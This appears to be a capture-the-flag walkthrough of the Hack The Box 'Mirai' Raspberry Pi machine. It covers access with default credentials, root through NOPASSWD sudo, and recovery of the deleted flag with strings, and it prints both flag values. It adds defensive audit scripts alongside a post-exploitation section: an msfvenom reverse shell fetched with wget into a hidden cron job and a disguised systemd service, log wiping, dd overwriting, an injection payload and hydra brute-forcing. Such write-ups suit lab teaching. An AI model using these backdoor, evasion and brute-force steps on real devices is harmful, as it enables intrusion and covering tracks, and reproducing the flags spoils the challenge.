Machine Synopsis
Key Exploitation Techniques:
- Default SSH credentials for IoT devices (Raspberry Pi)
- Sudo misconfiguration (`NOPASSWD: ALL`) for immediate root access
- File system forensics using `df` and `strings` for deleted data recovery
- USB device analysis and data reconstruction
Reconnaissance & Enumeration
Port Discovery
```bash
$ nmap -sC -sV -A 10.10.10.48
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
```
IoT Device Identification
Key Indicators:
- dnsmasq DNS service (common on IoT devices)
- lighttpd web server (lightweight, IoT-friendly)
- SSH version patterns consistent with Raspberry Pi
Web Application Analysis
```bash
# Add hostname to resolve web interface
$ echo "10.10.10.48 mirai.htb" >> /etc/hosts
# Directory enumeration
$ dirsearch -u http://mirai.htb -w /usr/share/dirb/wordlists/common.txt
[21:05:29] 301 - 0B - /admin -> http://mirai.htb/admin/
```
Accessing `/admin` reveals a Raspberry Pi dashboard/control interface, confirming the IoT device identification.
Exploitation
Default Credential Testing
IoT devices, particularly Raspberry Pi systems, often retain default credentials:
Common Raspberry Pi Defaults:
pi:raspberry
pi:pi
admin:admin
```bash
# Test default SSH credentials
$ ssh pi@10.10.10.48
pi@10.10.10.48's password: raspberry
pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.4.50+ #970 Mon Feb 20 19:18:29 GMT 2017 armv6l GNU/Linux
```
Success: the default credentials `pi:raspberry` provide immediate SSH access.
User Flag Retrieval
```bash
pi@raspberrypi:~ $ ls
background.jpg Documents Music Pictures python_games Videos
Desktop Downloads oldconffiles Public Templates
pi@raspberrypi:~ $ cat Desktop/user.txt
ff837707441b257a20e32199d7c8838d
```
Privilege Escalation
Sudo Enumeration
```bash
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
```
Critical Misconfiguration: user `pi` has unrestricted sudo access without a password requirement.
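The `sudo -l` output above is the kind of thing a host-audit script should parse and flag automatically rather than leave to a manual read. The following is an added example, not code from the writeup: it parses `sudo -l` text (the sample is a constructed copy of the output shown for `pi`), separates the run-as spec, the tags and the command for each rule, and ranks rules that grant `ALL` as any user, with `NOPASSWD` raising the severity to critical. Function and variable names are the example's own.

```python
"""Audit `sudo -l` output for rules that hand out an unrestricted root shell.

Added example (not part of the original writeup). The sample below is a
constructed copy of the `sudo -l` output the writeup shows for user `pi`.
"""
import re

# Constructed sample, mirroring the writeup's `sudo -l` output for `pi`.
SAMPLE_SUDO_L = """\
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
"""

# A rule line looks like "(runas_user[ : runas_group]) [TAG: ...] command".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+?)\s*$")
USER_RE = re.compile(r"^User (\S+) may run the following commands")
TAG_RE = re.compile(r"^([A-Z]+):\s*(.*)$")


def parse_sudo_l(text):
    """Return (user, rules) where each rule is a dict with runas, tags, command."""
    user = None
    rules = []
    in_rules = False
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            in_rules = True          # rules follow the "User X may run" header
            continue
        if not in_rules:
            continue                 # skip the Defaults section
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = []
        # Tags such as NOPASSWD: or SETENV: precede the command spec.
        while True:
            t = TAG_RE.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = t.group(2)
        rules.append({"runas": m.group("runas").strip(),
                      "tags": tags, "command": rest})
    return user, rules


def dangerous_rules(rules):
    """Rules whose command is ALL, runnable as root or as any user.

    Returns (severity, rule) pairs: "critical" when no password is required,
    "high" when a password is still needed (the user's own password, which an
    attacker who logged in with it already has)."""
    findings = []
    for r in rules:
        if r["command"] != "ALL":
            continue
        runas_user = r["runas"].split(":")[0].strip()
        if runas_user not in ("ALL", "root"):
            continue
        severity = "critical" if "NOPASSWD" in r["tags"] else "high"
        findings.append((severity, r))
    return findings


if __name__ == "__main__":
    user, rules = parse_sudo_l(SAMPLE_SUDO_L)
    for severity, rule in dangerous_rules(rules):
        print(f"[{severity}] {user}: ({rule['runas']}) "
              f"{' '.join(t + ':' for t in rule['tags'])} {rule['command']}")
```

On the Mirai host both rules are flagged; the first (`(ALL : ALL) ALL`) is already a full-root grant because the attacker holds the `pi` password, and the second removes even that speed bump. The remediation is the usual one: drop the `NOPASSWD` line from `/etc/sudoers.d/` and restrict `pi` to the specific commands it needs.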
Root Access
```bash
pi@raspberrypi:~ $ sudo bash
root@raspberrypi:/home/pi# whoami
root
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)
```
Root Flag Investigation
```bash
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
```
Challenge: the original root flag has been deleted; a backup exists on the USB device.
Digital Forensics & Data Recovery
File System Analysis
```bash
# List mounted filesystems
root@raspberrypi:~# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/root 1.3G 1.1G 143M 89% /
devtmpfs 483M 0 483M 0% /dev
tmpfs 487M 0 487M 0% /dev/shm
tmpfs 487M 13M 475M 3% /run
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 487M 0 487M 0% /sys/fs/cgroup
/dev/mmcblk0p1 41M 21M 19M 53% /boot
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick
```
Key Finding: USB stick mounted at `/media/usbstick` (device `/dev/sdb`).
USB Device Investigation
```bash
root@raspberrypi:/# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root 1024 Aug 14 2017 .
drwxr-xr-x 3 root root 4096 Aug 14 2017 ..
-rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt
drwx------ 2 root root 12288 Aug 14 2017 lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
```
Data Recovery using strings
```bash
# Use strings to recover deleted data from raw device
root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
```
Data Recovery Success: Root flag recovered: 3d3e483143ff12ec505d026fa13e020b
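Why this works is worth spelling out: unlinking a file on ext2/ext3 removes the directory entry and marks the inode and data blocks free, but nothing overwrites the blocks, so the content survives on the raw device until it is reused. The following is an added example, not the writeup's own code, that re-implements the `strings` heuristic (runs of four or more printable ASCII bytes) over a block device image and then carves out tokens of the shape seen above. The image is constructed in memory to imitate what `/dev/sdb` contained, including the `>r &` noise, the directory names and the recovered value; `recover_from_device` takes a path to a real device or `dd` image supplied by the caller, and all names are the example's own.

```python
"""Recover deleted file content from a raw block-device image.

Added example, not from the original writeup. Mirrors what `strings /dev/sdb`
did on the box: scan raw bytes for printable runs, then pick out the tokens of
interest. The image below is constructed; the 32-hex value is the one the
writeup recovered from the USB stick.
"""
import re

# Constructed image: superblock-like noise, directory-entry names, a freed
# data block still holding the flag, and the surviving damnit.txt text.
CONSTRUCTED_IMAGE = (
    b"\x00" * 64
    + b"\x3e\x72\x20\x26\x00\x00"                       # ">r &" noise, 4 bytes
    + b"/media/usbstick\x00\x00lost+found\x00\x00root.txt\x00\x00damnit.txt\x00"
    + b"\xff" * 32
    + b"3d3e483143ff12ec505d026fa13e020b\n"              # value from the writeup
    + b"\x00" * 16
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
)

# GNU strings' default notion of "printable": space through tilde, plus tab.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}


def extract_strings(data, min_len=4):
    """Yield (offset, text) for each run of at least min_len printable bytes."""
    start = None
    for i, b in enumerate(data):
        if b in PRINTABLE:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                yield start, data[start:i].decode("ascii")
            start = None
    if start is not None and len(data) - start >= min_len:
        yield start, data[start:].decode("ascii")


# 32 lowercase hex digits: the shape of an HTB flag (and of an MD5 digest).
HEX32 = re.compile(r"\b[0-9a-f]{32}\b")


def carve_candidates(data, pattern=HEX32):
    """Return (absolute_offset, token) for every pattern match inside a string."""
    hits = []
    for off, s in extract_strings(data):
        for m in pattern.finditer(s):
            hits.append((off + m.start(), m.group(0)))
    return hits


def recover_from_device(path, pattern=HEX32, chunk=1 << 20):
    """Stream a real device or dd image through carve_candidates in chunks.

    A token straddling a chunk boundary would be missed; for short tokens on
    small media that is acceptable, for larger carving jobs keep an overlap."""
    hits = []
    base = 0
    with open(path, "rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                break
            hits.extend((base + o, s) for o, s in carve_candidates(buf, pattern))
            base += len(buf)
    return hits


if __name__ == "__main__":
    for off, s in extract_strings(CONSTRUCTED_IMAGE):
        print(f"{off:08x}: {s}")
    print("candidates:", carve_candidates(CONSTRUCTED_IMAGE))
```

The offsets are the useful extra over plain `strings`: they tell you which block the content sat in, which is what you need to confirm the block is no longer allocated (with `debugfs` `testb` on ext filesystems) and to document the recovery. The flip side for defenders is that "deleting" sensitive files from removable media does nothing; only overwriting the blocks, or encrypting the volume in the first place, removes the data.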
Post-Exploitation Techniques
Persistence Methods
SSH Key Persistence
```bash
# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f mirai_persistence
# Install as pi user
# mkdir -p /home/pi/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /home/pi/.ssh/authorized_keys
# chmod 600 /home/pi/.ssh/authorized_keys
# chown pi:pi /home/pi/.ssh/authorized_keys
# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
```
Cron Backdoor
```bash
# Create reverse shell payload
$ msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor
# Install persistent cron job
# wget 10.10.14.6/backdoor -O /usr/bin/.system-update
# chmod +x /usr/bin/.system-update
# echo "*/15 * * * * /usr/bin/.system-update" >> /etc/crontab
```
Service Installation
```bash
# Create systemd service for persistence
# cat > /etc/systemd/system/system-monitor.service << 'EOF'
[Unit]
Description=System Monitor Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/.system-update
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
# Enable service
# systemctl enable system-monitor.service
# systemctl start system-monitor.service
```
Defense Evasion
Log Sanitization
```bash
# Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/messages
# > /var/log/wtmp
# > /var/log/lastlog
# Clear command histories
# > /root/.bash_history
# > /home/pi/.bash_history
# Clear DNS logs
# > /var/log/dnsmasq.log
```
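Truncation of this kind leaves a fingerprint: `> /var/log/auth.log` produces a zero-byte file whose mtime is the moment of the wipe, whereas a healthy log is either non-empty or was created by `logrotate` at a predictable time. The following is an added example, not from the writeup, showing a small audit that flags logs which are missing or empty-but-recently-modified. It builds a constructed directory with `tempfile` so it runs offline; the function names and the `recent_seconds` threshold are the example's own choices.

```python
"""Flag log files that look truncated or removed.

Added example, not part of the original writeup. A log emptied with
`> /var/log/auth.log` becomes a zero-byte file with a fresh mtime; this audit
reports that pattern, plus logs that are missing outright.
"""
import os
import tempfile
import time

# Logs the writeup's cleanup commands target (lastlog/wtmp are binary records).
LOGS_TO_CHECK = ["auth.log", "syslog", "messages", "wtmp", "lastlog", "dnsmasq.log"]


def audit_logs(log_dir, now=None, recent_seconds=3600, names=LOGS_TO_CHECK):
    """Return (name, reason) findings for suspicious log files in log_dir."""
    now = time.time() if now is None else now
    findings = []
    for name in names:
        path = os.path.join(log_dir, name)
        if not os.path.exists(path):
            findings.append((name, "missing"))
            continue
        st = os.stat(path)
        # Empty and touched within the window: consistent with `> logfile`.
        if st.st_size == 0 and now - st.st_mtime < recent_seconds:
            findings.append((name, "empty but modified recently (possible truncation)"))
    return findings


def build_constructed_logdir():
    """Create a temp dir imitating /var/log after the cleanup commands above."""
    d = tempfile.mkdtemp(prefix="constructed_logs_")
    # syslog left intact: real content, day-old mtime.
    syslog = os.path.join(d, "syslog")
    with open(syslog, "w") as f:
        f.write("Aug 14 12:00:01 raspberrypi CRON[1234]: (root) CMD (run-parts /etc/cron.hourly)\n")
    old = time.time() - 86400
    os.utime(syslog, (old, old))
    # messages intact as well.
    with open(os.path.join(d, "messages"), "w") as f:
        f.write("Aug 14 12:00:01 raspberrypi kernel: usb 1-1.2: new high-speed USB device\n")
    # auth.log and wtmp truncated just now; lastlog and dnsmasq.log absent.
    open(os.path.join(d, "auth.log"), "w").close()
    open(os.path.join(d, "wtmp"), "w").close()
    return d


if __name__ == "__main__":
    for name, reason in audit_logs(build_constructed_logdir()):
        print(f"{name}: {reason}")
```

Two caveats a practitioner will want. First, `logrotate` with the `create` directive also produces a fresh empty file, so correlate findings with the rotation schedule and the `.1`/`.gz` siblings before calling it tampering. Second, any check that runs on the compromised host can itself be evaded by an attacker with root, which is the real lesson of this section: ship `auth.log`, `syslog` and `wtmp` to a remote collector as they are written, so that local truncation destroys only the local copy.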
Configuration Hardening (Anti-Forensics)
```bash
# Disable USB mounting
# echo "blacklist usb_storage" >> /etc/modprobe.d/blacklist.conf
# Secure deleted data
# dd if=/dev/urandom of=/dev/sdb bs=1M count=10
```
IoT-Specific Reconnaissance
```bash
# Raspberry Pi model identification
# cat /proc/cpuinfo | grep -E "(Hardware|Revision|Model)"
Hardware : BCM2835
Revision : a02082
Model : Raspberry Pi 3 Model B Rev 1.2
# GPIO pin status
# cat /sys/kernel/debug/gpio
# Temperature monitoring
# /opt/vc/bin/vcgencmd measure_temp
temp=42.8'C
```
Network Interface Analysis
```bash
# Wireless interface enumeration
# iwconfig
# iw dev
# Bluetooth devices
# hciconfig
# bluetoothctl list
```
IoT Service Discovery
```bash
# Check for IoT-specific services
# systemctl list-units | grep -E "(gpio|i2c|spi|uart)"
# Examine boot configuration
# cat /boot/config.txt | grep -v "^#"
# Check for camera module
# /opt/vc/bin/vcgencmd get_camera
```
Alternative Exploitation Methods
Web Interface Exploitation
```bash
# If admin panel is accessible, test for:
# - Default web credentials (admin:admin, admin:password)
# - Command injection in configuration forms
# - File upload vulnerabilities
$ curl -X POST http://mirai.htb/admin/config.php \
-d "command=; id; #"
```
Brute Force Alternative Credentials
```bash
# Common IoT credential combinations
$ cat > iot_creds.txt << 'EOF'
pi:raspberry
pi:pi
admin:admin
admin:password
root:raspberry
root:root
user:user
EOF
# Automated SSH brute force
$ hydra -C iot_creds.txt ssh://10.10.10.48 -t 4
```
USB Forensics Alternative Methods
```bash
# Alternative data recovery tools
# photorec /dev/sdb # GUI-based recovery
# testdisk /dev/sdb # Partition recovery
# dd if=/dev/sdb | xxd | grep -A5 -B5 "root.txt"
# File carving with scalpel
# scalpel -b -o recovery_output /dev/sdb
```
Network Service Exploitation
```bash
# DNS service enumeration
$ dig @10.10.10.48 mirai.htb
$ nslookup mirai.htb 10.10.10.48
# HTTP service exploitation
$ nikto -h http://mirai.htb
$ dirb http://mirai.htb /usr/share/dirb/wordlists/common.txt
```
Hardware-Specific Attacks
```bash
# If physical access available:
# - SD card extraction and mounting
# - UART/Serial console access
# - GPIO manipulation for hardware backdoors
# - Boot process interruption
```